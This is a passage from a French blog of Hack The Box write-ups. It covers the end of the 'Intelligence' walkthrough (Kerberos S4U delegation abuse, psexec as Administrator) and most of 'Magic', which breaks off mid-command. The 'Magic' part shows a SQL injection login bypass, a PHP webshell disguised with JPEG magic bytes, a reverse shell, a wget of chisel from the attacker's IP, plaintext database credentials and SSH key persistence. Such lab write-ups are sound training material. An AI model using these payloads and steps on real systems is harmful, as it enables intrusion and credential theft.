class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Getting TGT <span class="k">for</span> user </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Impersonating Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2self </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting S4U2Proxy </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saving ticket in Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ mv Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache admin.ccache </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;admin.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file RKiuvsgB.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service MGRO on dc.intelligence.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service MGRO..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.1879<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">8fa6.....9f53 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><p>Parfois bloodhound n&rsquo;affiche pas toutes les informations. Par exemple, je ne voyais pas la route de Ted vers svc_int.</p> <p>En effet, j&rsquo;ai l&rsquo;habitude de cliquer sur <strong>Outbound Object Control</strong>-&gt; <strong>Transitive Object Control</strong>.</p> <p>Mais il fallait faire :</p> <ul> <li><strong>Outbound Object Control</strong> -&gt; <strong>Group Delegated Object Control</strong></li> </ul> <p>Attention donc à bien regarder toutes les possibilités de <strong>Outbound Object Control</strong> sur un utilisateur owned.</p> <ul> <li> <p>Allowed To Delegate : WWW/dc.intelligence.htb Il faut regarder chaque parametre de l&rsquo;utilisateur sur bloodhound. J&rsquo;aurais dû reperer cela. Tout ne saute pas forcement aux yeux.</p> </li> <li> <p>psexec.py -k -no-pass <a class="link" href="mailto:intelligence.htb/Administrator@dc.intelligence.htb" >intelligence.htb/Administrator@dc.intelligence.htb</a> Pour <strong>psexec</strong>, attention ici j&rsquo;ai du préciciser <a class="link" href="mailto:Administrator@dc.intelligence.htb" >Administrator@dc.intelligence.htb</a> au lieu de l&rsquo;ip que j&rsquo;avais mis initialement : <a class="link" href="mailto:Administrator@10.10.10.248" >Administrator@10.10.10.248</a>. Il faut bien sûr que **dc.intelligence.htb **soit bien dans le /etc/hosts.</p> </li> </ul>HTB | Magichttps://leopoldabgn.github.io/writeups/p/magic-htb/Thu, 24 Jul 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/magic-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Magic cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Magic</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.185</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## mysql</span> </span></span><span class="line"><span class="cl">theseus : <span class="sb">`</span>iamkingtheseus<span class="sb">`</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">admin : <span class="sb">`</span>Th3s3usW4sK1ng<span class="sb">`</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.185 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">2048</span> 06d489bf51f7fc0cf9085e9763648dca <span class="o">(</span>RSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClcZO7AyXva0myXqRYz5xgxJ8ljSW1c6xX0vzHxP/Qy024qtSuDeQIRZGYsIR+kyje39aNw6HHxdz50XSBSEcauPLDWbIYLUMM+a0smh7/pRjfA+vqHxEp7e5l9H7Nbb1dzQesANxa1glKsEmKi1N8Yg0QHX0/FciFt1rdES9Y4b3I3gse2mSAfdNWn4ApnGnpy1tUbanZYdRtpvufqPWjzxUkFEnFIPrslKZoiQ+MLnp77DXfIm3PGjdhui0PBlkebTGbgo4+U44fniEweNJSkiaZW/CuKte0j/buSlBlnagzDl0meeT8EpBOPjk+F0v6Yr7heTuAZn75pO3l5RHX </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 11a69298ce3540c729094f6c2d74aa66 <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOVyH7ButfnaTRJb0CdXzeCYFPEmm6nkSUd4d52dW6XybW9XjBanHE/FM4kZ7bJKFEOaLzF1lDizNQgiffGWWLQ<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 7105991fa81b14d6038553f8788ecb88 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIE0dM4nfekm9dJWdTux9TqCyCGtW5rbmHfh/4v3NtTU1 </span></span><span class="line"><span class="cl">80/tcp open http syn-ack ttl <span class="m">63</span> Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Magic Portfolio </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="website--login-page">Website : login page </h3><p>On trouve un site internet sur le port 80 avec une page de login. Le site nous indique la possibilité d&rsquo;upload des images. Après avoir testé plusieurs combinaisons de credentials (ex: admin/admin, root/root&hellip;), on trouve une injection SQL qui nous permet de nous connecter</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">user: aaaa<span class="s1">&#39; or 1=1;-- </span></span></span><span class="line"><span class="cl"><span class="s1">password: aaaa&#39;</span> or <span class="nv">1</span><span class="o">=</span>1<span class="p">;</span>-- </span></span></code></pre></td></tr></table> </div> </div><p>En utilisant cela comme <strong>user</strong> et <strong>password</strong>, on obtient un accès à la page <strong>upload.php</strong>.</p> <h3 id="upload-image--exploit-magic-byte">Upload image : Exploit Magic Byte </h3><p>On peut uploader des images avec du code <strong>php</strong> à l&rsquo;intérieur. Pour que le code php soit executé et que le fichier soit uploadé, il a fallu :</p> <ul> <li>Changer le magic byte par celui d&rsquo;une image XXX :</li> <li>Modifier l&rsquo;extension en &ldquo;.php.jpg&rdquo; (ou &ldquo;.php.png&rdquo;)</li> </ul> <p>En une seule ligne de code, cela nous donne :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> -ne <span class="s1">&#39;\xFF\xD8\xFF\xE0&lt;?php system($_GET[&#34;cmd&#34;]); ?&gt;&#39;</span> &gt; shell_magic.php.jpg </span></span></code></pre></td></tr></table> </div> </div><p>On peut alors executer du code php sur la machine en utilisant le paramètre <strong>cmd</strong> :</p> <blockquote> <p>http://10.10.10.185/images/uploads/shell_magic.php.jpg?cmd=id</p> </blockquote> <p>Pourquoi cela fonctionne ?</p> <ul> <li>Le serveur vérifie l&rsquo;extension du fichier. Ici, la dernière extension est bien &ldquo;.jpg&rdquo;, notre fichier passe le 1er test.</li> <li>Ensuite, le serveur vérifie le magic byte, il s&rsquo;agit de plusieurs octets ecrit au début du fichier précisant le type : JPG, GIF, PHP. Il suffit donc de placer le magic byte d&rsquo;une image PNG ou JPG pour passer cette deuxième couche de protection.</li> </ul> <p>Pourquoi le code php est executé ? Apache traite toutes les extensions dans un nom de fichier et s’arrête à la <strong>première extension</strong> qu’il reconnaît comme &ldquo;exécutable&rdquo; (comme .php), même si elle n’est pas la dernière. D&rsquo;où l&rsquo;importance d&rsquo;écrire &ldquo;.php.jpg&rdquo;. Si on place seulement &ldquo;.jpg&rdquo;, le serveur apache interpretera le fichier comme une image et le code ne sera pas executé.</p> <p>En utilisant le reverse shell php &ldquo;pentest monkey&rdquo;, on obtient facilement un shell sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.185:51964. </span></span><span class="line"><span class="cl">Linux magic 5.3.0-42-generic <span class="c1">#34~18.04.1-Ubuntu SMP Fri Feb 28 13:42:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux</span> </span></span><span class="line"><span class="cl"> 06:41:39 up 19:17, <span class="m">0</span> users, load average: 0.00, 0.00, 0.00 </span></span><span class="line"><span class="cl">USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT </span></span><span class="line"><span class="cl"><span class="nv">uid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span>33<span class="o">(</span>www-data<span class="o">)</span> </span></span><span class="line"><span class="cl">bash: cannot <span class="nb">set</span> terminal process group <span class="o">(</span>1197<span class="o">)</span>: Inappropriate ioctl <span class="k">for</span> device </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">www-data@magic:/$ <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">www-data@magic:/$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">www-data@magic:/$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">9828</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">$ stty raw -echo<span class="p">;</span><span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + <span class="m">9828</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@magic:/$ whoami </span></span><span class="line"><span class="cl">www-data </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql-creds--dbphp5">mysql creds : db.php5 </h3><p>On trouve un fichier de base de donnée avec db.php5</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ cat db.php5 </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl">class Database </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbName</span> <span class="o">=</span> <span class="s1">&#39;Magic&#39;</span> <span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbHost</span> <span class="o">=</span> <span class="s1">&#39;localhost&#39;</span> <span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbUsername</span> <span class="o">=</span> <span class="s1">&#39;theseus&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> private static <span class="nv">$dbUserPassword</span> <span class="o">=</span> <span class="s1">&#39;iamkingtheseus&#39;</span><span class="p">;</span> </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="mysql-connection-chisel-port-forwarding--admin-creds">Mysql connection (chisel port forwarding) : admin creds </h3><p>On remarque que le port mysql est bien ouvert (3306), cependant, l&rsquo;outil <strong>mysql</strong> n&rsquo;est pas installé et on ne peut pas se connecter à la base de donnée :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ ss -lntp </span></span><span class="line"><span class="cl">State Recv-Q Send-Q Local Address:Port Peer Address:Port </span></span><span class="line"><span class="cl">LISTEN <span class="m">0</span> <span class="m">80</span> 127.0.0.1:3306 0.0.0.0:* </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ mysql </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Command <span class="s1">&#39;mysql&#39;</span> not found, but can be installed with: </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Pour contourner cela, j&rsquo;ai décidé d&rsquo;utiliser <strong>chisel</strong> pour faire du <strong>port forwarding</strong>. Le but étant d&rsquo;accéder au port 3306 du serveur depuis ma machine hôte. Pour faire cela, il suffit de telecharger le binaire chisel sur la page github. Voici les commandes à effectuer:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ wget http://10.10.16.2/chisel </span></span><span class="line"><span class="cl">--2025-07-24 07:00:58-- http://10.10.16.2/chisel </span></span><span class="line"><span class="cl">Connecting to 10.10.16.2:80... connected. </span></span><span class="line"><span class="cl">HTTP request sent, awaiting response... <span class="m">200</span> OK </span></span><span class="line"><span class="cl">Length: <span class="m">9371800</span> <span class="o">(</span>8.9M<span class="o">)</span> <span class="o">[</span>application/octet-stream<span class="o">]</span> </span></span><span class="line"><span class="cl">Saving to: <span class="s1">&#39;chisel&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">chisel 100%<span class="o">[===================</span>&gt;<span class="o">]</span> 8.94M 336KB/s in 26s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025-07-24 07:01:25 <span class="o">(</span><span class="m">351</span> KB/s<span class="o">)</span> - <span class="s1">&#39;chisel&#39;</span> saved <span class="o">[</span>9371800/9371800<span class="o">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">3306data@magic:/var/www/Magic$ ./chisel client 10.10.16.2:1082 R:3306:localhost:3306 &gt; /dev/null 2&gt; /dev/null <span class="p">&amp;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> <span class="m">5146</span> </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">----------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ ./chisel server -p <span class="m">1082</span> --reverse </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Reverse tunnelling enabled </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Fingerprint 4PDYwTjgAniyianMIlBvt3QRTZm4VpYL+kFf1nXfQPg<span class="o">=</span> </span></span><span class="line"><span class="cl">2025/07/24 16:02:12 server: Listening on http://0.0.0.0:1082 </span></span><span class="line"><span class="cl">2025/07/24 16:03:19 server: session#1: tun: proxy#R:3306<span class="o">=</span>&gt;localhost:3306: Listening </span></span></code></pre></td></tr></table> </div> </div><p>Depuis ma machine hôte, j&rsquo;utilise la commande <strong>mysql</strong> pour me connecter a mon port local 3306 qui est forward vers le port 3306 du serveur. On trouve alors une database &ldquo;Magic&rdquo; et une table &ldquo;login&rdquo; contenant les credentials suivants: admin : <code>Th3s3usW4sK1ng</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ mysql -h 127.0.0.1 -P <span class="m">3306</span> -u theseus -p </span></span><span class="line"><span class="cl">Enter password: </span></span><span class="line"><span class="cl">Welcome to the MariaDB monitor. Commands end with <span class="p">;</span> or <span class="se">\g</span>. </span></span><span class="line"><span class="cl">Your MySQL connection id is <span class="m">25</span> </span></span><span class="line"><span class="cl">Server version: 5.7.29-0ubuntu0.18.04.1 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Copyright <span class="o">(</span>c<span class="o">)</span> 2000, 2018, Oracle, MariaDB Corporation Ab and others. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Type <span class="s1">&#39;help;&#39;</span> or <span class="s1">&#39;\h&#39;</span> <span class="k">for</span> help. Type <span class="s1">&#39;\c&#39;</span> to clear the current input statement. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[(</span>none<span class="o">)]</span>&gt; show databases<span class="p">;</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Database <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> information_schema <span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Magic <span class="p">|</span> </span></span><span class="line"><span class="cl">+--------------------+ </span></span><span class="line"><span class="cl"><span class="m">2</span> rows in <span class="nb">set</span> <span class="o">(</span>0.145 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[(</span>none<span class="o">)]</span>&gt; use Magic<span class="p">;</span> </span></span><span class="line"><span class="cl">Reading table information <span class="k">for</span> completion of table and column names </span></span><span class="line"><span class="cl">You can turn off this feature to get a quicker startup with -A </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Database changed </span></span><span class="line"><span class="cl">MySQL <span class="o">[</span>Magic<span class="o">]</span>&gt; show tables<span class="p">;</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> Tables_in_Magic <span class="p">|</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> login <span class="p">|</span> </span></span><span class="line"><span class="cl">+-----------------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.136 sec<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">MySQL <span class="o">[</span>Magic<span class="o">]</span>&gt; <span class="k">select</span> * from login<span class="p">;</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> id <span class="p">|</span> username <span class="p">|</span> password <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">1</span> <span class="p">|</span> admin <span class="p">|</span> Th3s3usW4sK1ng <span class="p">|</span> </span></span><span class="line"><span class="cl">+----+----------+----------------+ </span></span><span class="line"><span class="cl"><span class="m">1</span> row in <span class="nb">set</span> <span class="o">(</span>0.106 sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="theseus-user--su">theseus user : su </h3><p>On se connecte en tant que <strong>theseus</strong> avec le mot de passe trouvé précédemment. Cependant, ssh ne fonctionne qu&rsquo;avec une paire de clé publique.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@magic:/var/www/Magic$ su theseus </span></span><span class="line"><span class="cl">Password: &lt;---- Th3s3usW4sK1ng </span></span><span class="line"><span class="cl">theseus@magic:/var/www/Magic$ cat /home/theseus/user.txt </span></span><span class="line"><span class="cl">6553.....4c7a </span></span></code></pre></td></tr></table> </div> </div><h3 id="ssh--theseus">SSH : theseus </h3><p>Pour obtenir un shell plus stable, j&rsquo;ai généré une paire de clé <strong>RSA</strong> et j&rsquo;ai ajouté la clé publique dans le fichier <strong>authorized_keys</strong>. Ensuite il suffit de copier le clé privé et de la mettre sur ma machine hôte, puis d&rsquo;effectuer une connexion ssh :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">theseus@magic:~$ ssh-keygen -t rsa </span></span><span class="line"><span class="cl">Generating public/private rsa key pair. </span></span><span class="line"><span class="cl">Enter file in which to save the key <span class="o">(</span>/home/theseus/.ssh/id_rsa<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter passphrase <span class="o">(</span>empty <span class="k">for</span> no passphrase<span class="o">)</span>: </span></span><span class="line"><span class="cl">Enter same passphrase again: </span></span><span class="line"><span class="cl">Your identification has been saved in /home/theseus/.ssh/id_rsa. </span></span><span class="line"><span class="cl">Your public key has been saved in /home/theseus/.ssh/id_rsa.pub. </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">theseus@magic:~$ <span class="nb">cd</span> .ssh </span></span><span class="line"><span class="cl">theseus@magic:~/.ssh$ cat id_rsa.pub &gt; authorized_keys </span></span><span class="line"><span class="cl">theseus@magic:~/.ssh$ cat id_rsa </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"><span class="c1">## [Ctrl-C, Ctrl-V] --&gt; copie de la clé privée sur la machine hôte</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ vim theseus.key </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">$ chmod 